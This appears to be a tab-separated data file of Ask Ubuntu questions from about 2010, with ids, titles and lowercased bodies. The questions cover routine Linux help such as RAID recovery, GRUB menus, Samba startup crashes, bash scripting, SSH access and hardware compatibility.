15981	are there magic commit words in launchpad code ?	i know in a lot of source control tracking systems ( redmine , trac , jira ) you can add magic words like resolves # 1234 in your commit message to have the bug updated to a certain status . is there a feature like this with launchpad - if so where , or what , is the list of magic keywords ? an example can be seen on redmine 's issue tracker page . http : //www.redmine.org/issues/6987 has two `` associated revisions '' they 're associated because the commit message has fixed : wiki # find_page should not be case sensitive because page title uniqueness is not ( # 6987 ) . the combination of fixed as a keyword and # 6987 , bug 's unique id , automatically updated the associated ticked to fixed .
15982	is it possible to use mouse gestures without pressing a key ?	is it possible to use easystroke ( or other program ) without an initiate key ? because there is no key for it on the tablet ( joojoo ) . i hope you know what i try to explain . -- > mouse gestures in black & white ( the game ) - style : -d
15986	how do i unmark a `` failed '' md device ?	in an effort to clean up from a software bug in md , i marked half of a raid ( /dev/sda1 and /dev/sdb1 in raid1 ) as faulty using : mdadm /dev/md2 -- fail /dev/sdb1 mdadm /dev/md2 -- remove /dev/sdb1 but now i want to use the `` failed '' half instead . i.e . instead of using /dev/sda1 , i want to use /dev/sdb1 , but mdadm refuses to bring it online : mdadm -- stop /dev/md2 mdadm -a /dev/md2 /dev/sdb1 -- run -- force this fails , as it considers /dev/sdb1 a `` spare '' and not an actual member of the array any more .
15988	browse internet inside terminal	is there any other package other than elinks so that i browse internet inside the terminal using terminal as a browser . i feel elinks is a bit difficult to operate .
15994	main.c error while `` making '' grass	i use grass gis 6.4.1 svn version for my work . i keep the code in a directory inside my home directory . today i updated it with svn up command and configured using the following command . ./configure -- with-tcltk-includes=/usr/include/tcl8.5 -- with-proj-share=/usr/share/proj -- with-gdal=/usr/bin/gdal-config -- with-cxx -- enable-64bit -- with-python=/usr/bin/python2.6-config however i got one error in the make process in one d.rast module . therefore , as instructed i changed to that directory and ran 'make ' command . now i get the following bunch of errors . chethan @ chethan-desktop : ~/applications/grass64_release/display/d.rast $ make gcc -i/home/chethan/applications/grass64_release/dist.x86_64-unknown-linux-gnu/include -g -o2 -dpackage=\ '' '' grassmods '' \ '' -i/home/chethan/applications/grass64_release/dist.x86_64-unknown-linux-gnu/include -o obj.x86_64-unknown-linux-gnu/main.o -c main.c main.c : in function ‘main’ : main.c:89 : error : ‘flag_n’ undeclared ( first use in this function ) main.c:89 : error : ( each undeclared identifier is reported only once main.c:89 : error : for each function it appears in . ) make : *** [ obj.x86_64-unknown-linux-gnu/main.o ] error 1 i have no clue as to why these errors arise . what should i do now ?
16001	what interface mockup programs are available ?	are there any interface mockup design applications for ubuntu ? i need one in order to design programs or interfaces ( internet sites and more ) .
16004	organize folders in ubuntu one	i have uploaded some music folders from my computer to my ubuntu one storage . i want to know if there is a way to have those folders moved into another folder i created or have them sync to that folder in ubuntu one . thanks .
16007	switch to a targeted initrd after setup ?	during the ubuntu server setup , i was given a choice to install a 'targeted ' initrd with only the modules my computer needs . i chose the other option , 'generic ' . how can i install a 'targeted ' initrd now that i 've already installed my system ?
16010	using 'pureadmin ' with 'pure-ftpd ' how to ( successfully ) add an ad-hoc `` virtual user '' ?	i have installed pure-ftpd , along with the pureadmin gui . i 've just put myself through a crash-course on permissions and groups and users and sticky-bits and suids and guids.. and i 'm now quite convinced that i know just enough to get myself into trouble ... . and i have ( sort of ) : ) ... basically , i 'm stuck . i 've managed to acces the server via a local user ( ie . local to the server 's computer ) ... but that was notably simple , because i did n't have to do anyting ... it must be the default setting .. ( i do n't know if that is pure-ftpd 's default , or pureadmin 's ) . using pureadmin , i added a new ad-hoc user ... however , this pure-ftpd virtual-user is not able to connect to the server . is this a pam issue ? ... it is failing with this message ( s ) [ info ] pam_rhost enabled . getting the peer address [ warning ] authentication failed for user [ adhocuser ] i 've read a bit about pam ... but i do n't want to go into it any deeper than need be ( at the moment ) , as there may be a more direct pure-ftpd approach to this authentication issue..
16011	why is hibernation performance so poor ?	why is the hibernation performance ( i.e the time taken to hibernate and wake up ) on my laptop so poor with ubuntu ? this is n't a criticism per se but i 'd be interested to know if there was a particular reason why it was so slow . is this a problem with every ubuntu install ? my hardware specs : intel core i3 2.13 ghz 3 gb ddr3 ram 320 gb hdd hdd benchmark : /dev/sda5 : timing buffered disk reads : 96 mb in 3.06 seconds = 31.40 mb/sec
16014	web sites see my firefox as a mobile browser	something strange happening to me is that some sites see firefox as a mobile browser on ubuntu and force usage of their mobile interface with no option to switch to full view . they work well with chrome on ubuntu and firfox on windows . so how can i solve this problem ? update : example site : http : //www.shorouknews.com ( it 's an arabic news website ) my user agent string : mozilla/5.0 ( x11 ; u ; linux i686 ; en-us ; rv:1.9.2.12 ) gecko/20101027 ubuntu/10.10 ( maverick ) firefox/3.6.12 please note that the site works well on chrome in ubuntu and firfox on windows .
16015	ubuntu one encryption ?	i have two questions ... firstly , is the communication between my ubuntu desktop and the ubuntu one cloud encrypted ? secondly , are the files , media etc . stored on my ubuntu one account encrypted on the servers ?
16017	how can i run compiz-fusion effects with ati radeon x1250 ?	i was installing ubuntu 10.10 to my friend laptop , but when trying to set up effects , i got an error . then i tried to install proprietary drivers , but this card is too old and no longer supported . : ( please help .
16021	is it possible to install firefox 3.0 as well as the default package ?	i 'm a webdeveloper and using ubuntu 10.10 maverick . i want to track down a bug that appears in firefox 3.0 , but not 3.5/3.6 . is there an easy way to install firefox 3.0 without it overwriting/clobbering my main install of firefox ? i.e . i want to install both 3.0 and 3.6 at the same time
16022	can i limit the amount of logging to `` /var/log '' , especially for `` bootchart '' ?	i 've just noticed that i have 342 mb of log files in /var/log in particular /var/log/bootchart takes 329 mb of this space ! as i 'm only running a home desktop environment , i ca n't see how i need this amount of `` history '' , and perhaps do n't need bootchart at all . how can i limit/prevent this bootchart logging ( and what purpose does it serve ) ?
16031	ubuntu keeps creating dummy directories	whenever i boot into ubuntu , something ( frankly , i 'm not sure which program does that ) creates a bunch of directories , namely ~/music , ~/videos , ~/documents , and ~/audiobooks . i know it 's possible to change the names of these directories with ubuntu-tweak , but i do n't want these directories in the first place ... how do i prevent ubuntu , or whatever program is responsible for the creation of these directories , from creating them ?
16032	how to browse the web safely with mozilla firefox ?	i want to know how can i possibly keep me secured from forgery sites . i am currently using mozilla 3.7
16036	need a mp3 id3 tagger , and cover fetcher	i need to tag my mp3 library , and have tried kid3 ( which was manual tagging ) , when i used kubuntu 9.10 ( i now use ubuntu meerkat ) here are the features i am hoping for : a good and clean ui . tagging should be automatic , like winamp 's autotag feature , which rocks , btw ! it should also embed the cover-art in the mp3 , not copy a jpeg file in the folder , because now-a-days all players support displaying cover art . but acceptable if not possible . rename the files as per some regular expression like % trackno - % artist - % title . should be accurate , and more importantly smart . i want to start tagging at night , and hopefully my collection should be done by the morning , w/o it being stuck at a user prompt at 1 % . if one app cant do all , i am willing to use 3 , would n't mind exposure to a few more apps ; ) i have used picard or someting , and i didnt like it quite a lot . but would n't mind using it , if there is no other alternative . thanks for your time !
16038	using a folder on an ntfs partition as /home	i use wubi to install ubuntu 10.10 on my ntfs partition . so i want to change the home folder to a folder on the ntfs partition . i could keep the personal configuration , software and so on after reinstalling the ubuntu . so i use ntfs-config to manage the disk partition , it 's mounted when system is startup . and the permission of all files and directories are 777 . then i modified the /etc/passwd to set the home folder to the folder on the ntfs partition . i can successfully login the account , however it looks like the .bashrc and .profile are not loaded correctly . i ca n't use the input method ( even ca n't configure ibus ) , no sound device . however everything works well after changing the home folder back to /home/ . could anybody give me a hint to make it work ? thanks .
16042	how to get to the grub menu at boot-time ?	this issue came up recently for me ( and i 've been prompted to lodge it as a specific question about it ) : my system is not dual-boot , i run a standard ubuntu desktop system `` on the metal '' ( i think running it in a vm is the same ) . pressing c while booting does not cause the grub menu to appear ( which i believe it does for a dual-boot system ) . how can i get the grub-menu to present itself on a single-boot system ?
16043	how do i get awn back ? ( get into a terminal if all panels and docks are gone )	i had installed and loved awn , and had removed my last panel using these instructions . everything was wonderful . however , apparently i was using an awn package for lucid - i 'm on maverick . after a recent run of the update manager , awn was removed , and i now have no access to anything - ca n't get at any of my applications or folders . the only reason i 'm able to even write this message is because i had installed the unity netbook packages to play with , so i restarted and booted into a netbook edition session . can someone help me get my desktop edition back ? is there a keyboard shortcut i do n't know about to run a terminal window ? i assume if i could get into terminal , i could reverse the instructions about hiding the last panel , and once i have a panel i could add the applications menu back , and then from there try to find a version of awn that works on maverick . edit : javier 's answer below did get me back into the gui with a panel that i was able to add the applications menu to . however , here 's what i found . when i go into the software center to install awn , it turns out i had previously installed it using a ppa that i found on launchpad , called ppa for awn testing team ( that 's what shows up in the software center . ) when i try to install awn directly through the software center , it tells me i need to remove several packages that apparently got left behind ( libawn1-trunk , python-awn-extras-trunk , and python-awn-trunk . ) when i go into the ppa in the software center , i do see those packages , but clicking remove does n't actually do anything . it 's like they 're stuck . i tried to get into synaptic to remove the packages from there , but when i try to run it from the applications menu , i get this error : failed to run /usr/sbin/synaptic as user root . unable to copy the user 's xauthorization file . how can i get rid of those packages so i can reinstall awn directly from the software center ?
16050	remotely run a command on a ssh-server with a script	i want to run a command on a ssh-server , but this command is determined by a script on my local machine . how do i do that ? an example for clarity : i want to write a script here ( foo.sh ) that takes an argument . if i run ./foo.sh 0 it should somehow send a shutdown signal to the server machine , but if i run ./foo.sh 1 it should send a restart signal . i know how to manually login via ssh , and i 've already set ssh-keys to skip passwords , but i do n't know how to automate the procedure with a script .
16058	dropbox instead of the documents folder ?	hello i was wondering if it 's possible to make dropbox sync my ~/documents folder ? i 'm on ubuntu 10.10 netbook remix ( not that nbr should matter that much ) . i 've read how to do this on windows , and i was wondering if it 's possible to do it on ubuntu as well . thanks in advance .
16060	how to create vmware player image with linux as the os	how can i create an image ( .iso ) that contains : 1 . base ubuntu os 2 . java , cxf + some more software i want these bundled as one vmplayer image . how can i do this ?
16061	how do i permanently fix the time on a bootable usb key ?	i noticed the time is about 7 hours off , if i fix it , restart the time will be off again , anyway to permanently fix the time on the usb flash drive ?
16066	my system time resets to january 2007 . how can i solve this ?	i am facing a weird problem that my system clocks resets to jan 1 2007 to 0:00 . can anybody help me to rectify it ? the bios show the same time . what should i do ?
16073	wrong compiler error in code blocks	i am currently using code blocks 10.05 as a c++ compiler but i am facing a problem during building of source code ( compiling ) . it displays an error that - debug program uses a wrong compiler , skipping ... i am using a gnu compiler from console application menu . please help to rectify problem
16077	ca n't install on dell inspiron 15r	i just purchased a dell inspiron 15r and use ubuntu as my primary operating system . well i tried to install all of the following without any success : ubuntu 10.04 x86-32bit ubuntu 10.10 x86-64bit ubuntu 10.10 mini x86-32bit ubuntu 10.10 mini x86-64bit lubuntu 10.10 xubuntu 10.10 this was all from the cd-rom , i then decided to try it from usb with no success . i verified windows 7 is working upon booting into it . i am kind of lost .
16085	what do i need to know in order to help with bug/papercut fixing ?	i think the question is clear enough . one thing though , i 'm interested in the programming part not something else .
16086	anonymous internet browsing	could you please suggest me a good anonymous internet browsing application for ubuntu ?
16094	tracking the popularity of a package over time ?	is there any software or website that allows the user to view a graph of how popular a particular package is ? the popcon.ubuntu.com site has raw information on how many people ( who have installed popularity-contest ) have installed a particular package , but it would be interesting to see how a package 's popularity changes over time . i remember using a website that graphed this , but i do n't know if it still exist .
16101	firefox address bar does n't autocomplete	when i start computer ; or resume from standby ; for few minutes firefox address bar does not offer autocomplete . after few minutes , every works normally . ubuntu maverick firefox 3.6.12 that came with ubuntu , updated through apt-get laptop thinkpad t60p
16104	share between ubuntu machines	i 'm sure it might be a very easy way to do this , but i have n't found how ... i have two machines with ubuntu 10.10 on the same network ( just workgroup , no domain involved ) . on one of them i have shared a folder through nautilus folder sharing . when opening the network place on the second machine , i can not see the first one listed , just windows network and when going into this folder i can see the workgroup though when trying to go into it i get an unable to mount . failed to retrieve share list from server error . is it required to do something else when sharing the folder through nautilus ?
16105	how can i troubleshoot `` vpn connection failed '' ?	is there anyway to get an error log for a failed vpn connection attempt ? all i get is this notification and i have no idea where to go from there :
16106	how can i create an alias for cd and ls ?	i frequently run the ls command after running the cd command . how can i create an alias ( like cs ) for this operation ?
16112	how to enable persistent option in disk creator ?	i try to test natty alpha with usb . ( my system is 10.04 ) but when i run disk creator i can not choose the option for persistent creation . here on screenshots i saw that this is possible . choosing the second option `` burn your cd or create a usb drive '' http : //www.ubuntu.com/desktop/get-ubuntu/download when i create live usb without persistent options i can not activate my nvidia drivers and 3d support for unity because after restart settings are lost .
16117	are there plans to support the wwf file format ?	first , read this article . second , are there plans to build support for this format into ubuntu ? for example , print to file support , support from evince , etc . it acts exactly like a pdf , but you ca n't print it out . `` decide for yourself which of your documents do n't need printing -- and save them as wwf , '' the wildlife organisation suggests . â wired
16118	what will let me apply a color curve to video ?	i want to use one of these on a video : i ca n't even find linear adjustments in the video editor that is included with ubuntu . this should be trivial . what have i missed ?
16125	me menu is broken	the me menu on the top panel does not let me type a status to post to gwibber or pidgin . it simply is a grayed-out box that says `` post message ... '' i can not type into it . also , the status selector only works ( not grayed out ) when pidgin is logged in ; i can not go from offline to available . i already tried re-installing indicator-session , indicator-applet-session , indicator-me , gwibber , and gwibber-service , and removing and re-adding the applet . edit : here 's the console output when running gwibber . it throws some errors , but none seem to be relevant . ** ( gwibber:7611 ) : warning ** : trying to register gtype 'wnckwindowstate ' as enum when in fact it is of type 'gflags' ** ( gwibber:7611 ) : warning ** : trying to register gtype 'wnckwindowactions ' as enum when in fact it is of type 'gflags' ** ( gwibber:7611 ) : warning ** : trying to register gtype 'wnckwindowmoveresizemask ' as enum when in fact it is of type 'gflags ' /usr/bin/gwibber:73 : gtkwarning : ia__gtk_container_add : assertion `gtk_is_container ( container ) ' failed gtk.main ( )
16135	why did apport make my bug report private ?	apport detected a crash and assisted with submitting a bug report to launchpad , but it make the report private . why ? it does n't seem very helpful that i 'm the only one with permission to read the report . do i need to now track down someone else to look through it ?
16137	why does ubuntu use about twice as much ram as debian ?	i installed debian 5 + lxde and i was surprised that without an application running it used less than 50 mb of ram and with firefox and openoffice running it still used less than 100 mb of ram . ubuntu + lxde with firefox and openoffice running uses much more ram . why is that ?
16143	is there a way to start a bash script after boot only when wlan0 is connected	i want to start a bash script in ubuntu after boot . but the script should run first after wlan0 device is connected to my wifi . how can i achieve this ?
16144	where can i find the most recent snapshot of gnome-shell ?	i would love to try out the latest gnome-shell from git but it is having difficulty compiling on my machine . not to mention , it 's an extremely time-consuming process with terse error messages , so it 's been hours of trial-and-error so far . i even tried it on a natty setup but it did n't work . the one from the repos works great , but it 's fairly outdated from what i understand . are there any charitable devs out there that want to contribute a deb or ppa for those of us who would like to try it out ?
16145	how to give ssh access to trusted friend ?	i 've got a friend that i trust enough to give ssh access to one of my servers . to this end , i 've created a user account for him . the box is accessible by key authentication only , not passwords . i 've created a private key for that account , but if i send it to him over email , we kinda lose the point of the strong ( er ) security what 's the best way of giving him access to this account without having to resort back to password authentication ? additional difficulties : he 's on a windows box , but easy enough to install putty
16149	overwrite previous output in bash instead of appending it	for a bash timer i use this code : # ! /bin/bash sek=60 echo `` 60 seconds wait ! '' echo -n `` one moment please `` while [ $ sek -ge 1 ] do echo -n `` $ sek `` sleep 1 sek= $ [ $ sek-1 ] done echo echo `` ready ! '' that gives me something like that one moment please : 60 59 58 57 56 55 ... is there a possibility to replace the last value of second by the most recent so that the output does n't generate a large trail but the seconds countdown like a real time at one position ? ( hope you understand what i mean : ) )
16155	firefox & openoffice do n't use indicator applet application menu	at present , it seems neither firefox nor open office seem to be using the indicator applet application menu . is there a work around/fix committed ?
16159	rhythmbox sound cuts , cracks when other programs are running	i upgraded to ubuntu 10.10 . when firefox or my photo album is open the sound in rhythmbox cracks and cuts like someone scratching a disc with a needle . on its own or with evolution open the sound is fluid and entirely undisturbed . how can i fix this ?
16160	execute bash script at startup , but only once a day ?	i have a bash script that should be executed on ubuntu startup after boot . the problem is the script should be only executed once a day . so when the script recognizes that it already has been executed today it should stop itself . how can i do this ?
16162	bash : if condition to check if actual date exists as string in file ?	in a file i have a string like this which is the date of today sa 4 . dez date format is like this stringtoday=`date + % y- % m` now i wan na use a if condition to check if the date of today exists in this file and if that 's the case i want stop the bash script . if the date is not in this file . the script should run . how can i do this ?
16164	how does one change the chromium icon automatically after updating ?	i use the daily ppa build of chromium . the daily build uses a png i believe instead of an svg , so it looks rather horrid on my dock . and zoomed in : ( not too sure why the icon is getting clipped in this screenshot , i did a select area method which perhaps has made it funky . anyway , you get the idea ! ) so after every update , i have to manually go into /usr/share/applications and manually select an svg chromium icon for the chromium launcher to use . since chromium uses the daily build , this is rather tedious to do following every update . is there a means / scripting method that can be put into place that will automatically change chromium 's icon following an update of chromium ?
16167	how do i get the grub menu to show when starting my dual-boot system ?	recently i have installed ubuntu 10.10 and selected a wrong option while installing it . now the problem is that my machine directly boots ubuntu and even does not show me grub menu . how do i install grub menu ? and how do i add windows vista to the grub menu ? this is what i have tried . sudo grub > root ( hd0,0 ) > setup ( hd0 ) error 17 : can not mount selected partition i do n't know what 's going wrong here and i am sure that i have not wiped out my windows partition . edit : sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found memtest86+ image : /boot/memtest86+.bin ls : can not access /media/bc54b2c654b282a6/boot boot : no such file or directory done sudo os-prober ls : can not access /media/bc54b2c654b282a6/boot boot : no such file or directory thanks .
16168	how to install easytether ?	could you please provide steps to install easytether on ubuntu and getting on internet using usb .
16172	getting flash 10.2 gpu acceleration working	i 'm using 32 bit ubuntu 10.10 and the latest version of the nvidia drivers for an ion gpu and have downloaded the new 10.2 flash beta . i can confirm that in firefox i am using the beta of flash but no hardware acceleration is used for flash videos . do i need to install some more libraries ? change desktop manager ?
16173	notify-osd stops working after totem has been running for a while	i 'm using notify-send to get notifications . since yesterday , it stopped working . after a reboot , i could get a few messages through , but a minute later i ca n't any more . i have spammed it with a few hundred messages and killed it , but as i said - i 've rebooted since . killing and restarting the process at /usr/lib/notify-osd/notify-osd gives me a warning , `` another instance has already registered org.freedesktop.notifications '' , and subsequently `` could not register instance '' . note that the notifications from banshee come through no problem . it 's - as far as i can tell - only notify-send that does n't work properly ; there is n't any output from it about what could be wrong either . here are the contents of ~/.cache/notify-osd.log [ 2010-12-04t16:50:07-00:00 , notify-send ] test hello [ 2010-12-04t16:53:35-00:00 , notify-sharp ] octopus 's garden by 'the beatles ' from 'abbey road ( 2009 stereo remaster ) ' only the first one did n't appear on the screen ; the command i ran was notify-send test hello . the problem seems to be related to totem , or at least any application - as dor suggested - that inhibits the screen saver from being started . here 's how to replicate the problem : start totem , make sure `` disable screen saver while playing [ all ] '' is enabled let it play something for as long as the idle time-out for the screen saver try to notify-send i can now reproduce the problem consistently , so i should really file a bug .
16174	shutter preferences are not getting saved	i have installed shutter package.and in preferences i have set save path to desktop.when ever i close shutter and start again the save path points to somewherelse.it keeps changing randomly.i ca n't even figure out the problem.can anybody help me ?
16177	what made `` smbd '' stop running on boot-up ?	recently i was faced with a weird problem on my samba server ( ubuntu 10.04 lts am64 ) when all shares were `` suddenly '' inaccessible to the clients . tracking down the error revealed that smbd was not started on boot-up . from the syslog : [ ... ] dec 4 12:28:45 takkat-home dhclient : dec 4 12:28:45 takkat-home networkmanager : < info > dhcp : device eth0 state changed ( null ) - > preinit dec 4 12:28:45 takkat-home init : smbd main process ( 1027 ) terminated with status 255 dec 4 12:28:45 takkat-home init : smbd main process ended , respawning dec 4 12:28:45 takkat-home dhclient : listening on lpf/eth0/00:24:1d:25:40 : e4 dec 4 12:28:45 takkat-home dhclient : sending on lpf/eth0/00:24:1d:25:40 : e4 dec 4 12:28:45 takkat-home dhclient : sending on socket/fallback dec 4 12:28:45 takkat-home avahi-daemon [ 917 ] : no service file found in /etc/avahi/services . dec 4 12:28:45 takkat-home init : smbd main process ( 1045 ) terminated with status 255 dec 4 12:28:45 takkat-home init : smbd main process ended , respawning dec 4 12:28:45 takkat-home init : smbd main process ( 1050 ) terminated with status 255 dec 4 12:28:45 takkat-home init : smbd main process ended , respawning [ ... ] and smbd.log : [ ... ] [ 2010/12/04 12:28:45 , 0 ] smbd/server.c:1069 ( main ) smbd version 3.4.7 started . copyright andrew tridgell and the samba team 1992-2009 [ 2010/12/04 12:28:45 , 0 ] printing/print_cups.c:103 ( cups_connect ) unable to connect to cups server localhost:631 - connection refused [ 2010/12/04 12:28:45 , 0 ] printing/print_cups.c:103 ( cups_connect ) unable to connect to cups server localhost:631 - connection refused [ 2010/12/04 12:28:45 , 0 ] smbd/server.c:1115 ( main ) standard input is not a socket , assuming -d option [ 2010/12/04 12:28:45 , 0 ] passdb/pdb_interface.c:253 ( guest_user_info ) guest_user_info : unable to locate guest account [ guest ] ! [ 2010/12/04 12:28:45 , 0 ] smbd/server.c:1201 ( main ) error : failed to setup guest info . [ 2010/12/04 12:28:45 , 0 ] smbd/server.c:1069 ( main ) smbd version 3.4.7 started . copyright andrew tridgell and the samba team 1992-2009 [ ... ] it was clear that smbd crashed . before that i did not change anything to the samba configuration , did not install anything but security updates and did not create or delete any new users . today , i got everything repaired and running smooth as usual by simply running sudo smbd restart the crashes on boot are gone and shares are available to clients again . still , i have no clue what process was responsible for this behaviour and i am worried on how to avoid this in the future . any ideas of what process could be made responsible for smbd crashing would be much appreciated . also i 'd be interested to hear what restarting smbd could possibly have repaired and if this was a good idea to do at all .
16178	why is it bad to login as root ?	i 've often come across posts on forums or other websites where you see people joking in such a manner about running/logging in as root as if it 's something awful and everyone ought to know about it . however , there is n't much that a search reveals on the matter . it maybe widely known to linux experts , but i really do n't know why . i remember always running as root when i first tried linux years ago ( redhat and mandrake ) and do n't remember running into any problems because of that . there are actually some distros that have a bright red background with alert signs all over it as wallpaper for the root user ( suse ? ) . i still use the `` administrator '' account for regular use on my windows installation and have n't ever run into any problems either .
16182	installation of trading-shim	there is a software for trades called trading-shim . i played a little bit around to install it , but i wanted to know if some people out there know how to install .
16184	can you change the orientation of the unity launcher ?	i was looking at 11.04 pre-alpha and wondering if i can change the dock orientation . does the pre-alpha have this function ? is the idea being implemented as we speak ? if not where can i propose this idea ?
16187	how do i adjust the volume without pulseaudio ?	i removed pulseaudio from my system following problems with wine . now things work well , including spotify . however , there is no way to control system volume , although i can control volume inside applications . when i click system- > preferences- > sound , a pop up says `` waiting for sound system to respond '' and it gets stuck there . is there any alternative that would allow me to adjust system volume ?
16191	purchasing an ebook reader	i want to purchase an ebook reader that can read .pdf format ? can anyone suggest me a good one . i want an ebook reader not a tablet .
16192	how do i create a usb startup disk with the nvidia drivers installed ?	i 'm trying to test natty with unity from an ubuntu usb key but need the nvidia drivers installed to run unity on my xps m1330 . when i try to activate the drivers as i would normally do there is an error activating them . i 'm assuming that this is because i ca n't update the usb key , but i 'm not sure . how do i install the nvidia drivers on the ubuntu usb key so that i can use it to test natty with unity ? thanks ! update : here is a link to the error message i receive https : //gist.github.com/728853
16205	can i connect to ubuntu one via ftp ?	is there any way i can connect to my account via ftp ( gftp ) ? wget would help ? i tried connecting via https and ftp ( one.ubuntu.com ) with my e-mail and password ( launchpad 's ) and did n't work . i just want to download all my files at once , not one by one .
16210	control compiz zoom from the command line	i 'm downstairs on my phone trying to vnc into my desktop upstairs but earlier today , i zoomed in with compiz on one of my screens so it makes using that screen over vnc almost impossible . now i could go upstairs ... but i 'm lazy ! does anybody know a way to turn off zoom via the command line ?
16211	how to install ppa packages in an apt-get style	i want to install ppa packages in a sudo apt-get install < program > style . i do n't want to google for the ppa name and i do n't want to execute add-apt-repository before executing apt-get . i just want to install a ppa package with one command like ppa install vim to get the newest vim ppa version . can you recommend me a tool ?
16219	cx_freeze - how can i install the shared libraries to /usr/lib	i am using cx_freeze to compile my python script and when i compile the program , all the files are placed in one specified folder . the executable wont run if the shared libs are not within the same directory . how would i set it up so the executable looks within /usr/lib/programname/ to run the libraries ?
16223	mouse cursor seems to change keyboard input focus	running 10.04 and 10.10 ( maybe before these ) i 've noticed that for some dialogs to accept input the mouse cursor must be in the parent window . this is the case even though from the window highlighting the dialog box is in focus . is there exposed configuration control for this behavior ? i 'm particularly interested in gui controls . i 've looked at mouse and window preferences - no joy .
16224	why do n't product specifications even mention ubuntu / linux ?	not sure if there is a specific , objective answer to this question but i get the same everything i want to buy a piece of hardware and try to check if it 's ubuntu / linux compatible : required os â microsoft windows 7 ( 32/64 bits ) , microsoft windows vista ( 32/64 bits ) , microsoft windows xp ( only 32 bits ) , mac os x 10.6.2 or higher , 10.5.6 or higher , 10.4.11 or higher thing is , the product usually does work flawlessly with ubuntu . why do n't these people even mention that in the product specifications ? why do they always make it harder for the ( admittedly small ) linux-using part of the population who want to buy their products ? it 's not like including that information somewhere would cost them money , would it ?
16225	how can i accept the microsoft eula agreement for ttf-mscorefonts-installer ?	after a recent update , ttf-mscorefonts-installer prompted me to accept its license agreement . for some reason my terminal will not allow me to accept , or for some reason i am pressing the wrong hotkey ... i 've tried every letter on the keyboard and enter among others ... i 'm sure there is a very simple and obvious solution to this . i 've also just tried to remove the package completely however the terminal states that due to the package not being correctly installed , i should reinstall the package before removing it . very frustrating ! essentially , because i can not successfully install this package , i ca n't really ever upgrade my system because i always have to end up terminating the terminal with the license agreement ( thus the upgrade fails ) .
16230	how come unity wo n't run on my ibm thinkpad t42 ?	why wo n't it run on my thinkpad t42 ?
16236	why % cpu does n't add up to 100 ?	why does n't the `` % cpu '' in system monitor add up to 100 ? ( % cpu is the third column on the following screenshot )
16239	how to debug suspend ?	i 've been using ubuntu for about five years now , and i still ca n't make it suspend when i want to . it 's quite irritating that i can program up a storm , hack the machine in numerous other ways , and yet , and yet when i try to make it suspend or debug suspend , i fail miserably . i need help . where do i begin to find the problem ? what do i do to fix it ? i 'm placing a bounty on this , because i 've literally lost hours of my life to this problem , and leaving my computer on all the time is terrible . the symptoms : pressing suspend brings my computer to a state where it has a blinking cursor , the fans are running , it seems that the hd has turned off ( i think ) , and i ca n't do anything to bring it back from this state ( short of a hard reboot ) . possibly related : my fans stay on even after a shutdown , and even then , i have to press the power button for five seconds before i can start it up again . i do n't know what logs to look at to debug the problem , and i imagine they 'd get nuked on reboot anyway . please , please help . this drives me completely nuts , and i 've been living with it for over a year .
16241	how to understand the audio subsystem ?	i already used a lot of ubuntu versions , i started with 5.10 . but eversince i had issues with the audio subsystem . no matter what hardware , currently i have two computers and both have issues . on my laptop i need to trigger the speaker channel to get sound , on my desktop , also ubuntu 10.04/32 bit it took me also a lot of fiddling to get the sound working . actually it just worked by accident . although the input sound quality is still really bad . now i installed on another partition ubuntu 10.04/64bit and sound is not working though the high level software stack seems to be fine . pavucontrol registers sounds and shows the correct hardware but i ca n't hear a thing . ( except on the other output jacks , front panel and the other channel , i hear strange sounds . ) my question is : how can i learn to understand ubuntu 's soundsystem and be able to debug such problems myself ? and another question : why is audio on ubuntu so complicated ? there must be tens of thousands of threads in online forums about these problems and i have already seen dozens of threads indicating no succesful solution . on the other hand there must be hundreds of problem solving guides but none of these is able to cover it all ... thanks , philip
16244	faulty upgrade from 10.4 to 10.10 can i redo the upgrade without erasing all the existing mess ?	i happily used 10.4 for abouit six months . when i upgraded to 10.10 my update manager stopped working and at last count there were about 250 updates lined up and waiting . also my sound configurations misfired ( it wo n't accept my logitech headset . ) i tried to follow advice from some other forums which did n't work . i also tried all sorts of nonsense myself . i think that now the best thing to do would be to either erase or overwrite whatever is there and start over with 10.10 anew . i can either do without or save whatever might be lost . most of my important stuff is in the google cloud . what might the best way for me to get back to work ? please help , i have had to go back to xp and it is driving me nuts . mike
16246	what wifi cards will work out of the box for desktop computers ?	i am planning on getting rid of all my wired connections in the house and switching everything over to wifi . my question pertains specifically to desktop computers , not laptops ! so my questions are 1 ) what wifi cards are proven to work , out of the box , with the latest version of ubuntu without needing to install additional software ? 2 ) what are the known issues with each one ( range issues , configuration issues etc 3 ) and if there is n't a solid out of the box choice , what are good alternatives that may require drives be installed but have minimal fuss to do so ? 4 ) all other considerations aside , what would be recommended as best choice if convenience and ease of installation was not an issue . thanks !
16251	diagnosing xmodmap errors	i 'm getting this error when trying to use xmodmap to get rid of caps lock : $ xmodmap -e 'clear lock' x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 118 ( x_setmodifiermapping ) value in failed request : 0x17 serial number of failed request : 8 current serial number in output stream : 8 i 'm running xfce on maverick `` 10.10 '' meercat . this problem did not occur before i added the keyboard layouts applet to a panel ; before doing that , i was able to run my xmodmap script to swap esc and capslock : ! remap caps_lock as escape remove lock = caps_lock keysym caps_lock = escape it may be relevant that i chose alt-capslock as the keyboard switch combo in the keyboard layouts preferences . i 've had a similar problem before , on a different machine , running openbox . on that machine , this problem started when i upgraded to lucid , and has persisted in maverick ( release 10.10 ) . i reported a bug in xorg . however , it remains unclear whether it 's really a problem with xorg , or if i 'm just doing something wrong with my configuration . have other people experienced this problem ? can someone shed some light on what 's going on here ? it seems there are quite a few layers involved , and i do n't understand any of them particularly well , so any information would be helpful . update i 've discovered that the problem is specifically triggered by adding the canada layout variant `` multilingual '' ( ca-multix ) . if i instead add the variant `` multilingual ( first part ) '' , the problem does not occur . i think this will probably end up being a usable workaround , but i do n't yet know what the difference between these variants is . i 've filed a freedesktop issue , and am commenting on a related ubuntu issue .
16253	what gui toolkit will ubuntu unity use ?	i develop some apps for gtk+ and so i use gnome heavily . but what will be unity 's gui toolkit ?
16254	broadcom open source drivers available in maverick ?	i have a laptop with a broadcom bcm4322 802.11a/b/g/n wireless adapter and its using the proprietary sta drivers ( perfectly ) , however i thought broadcom released open source drivers and that they would be included in maverick ( as according to here ) . how do i activate these ?
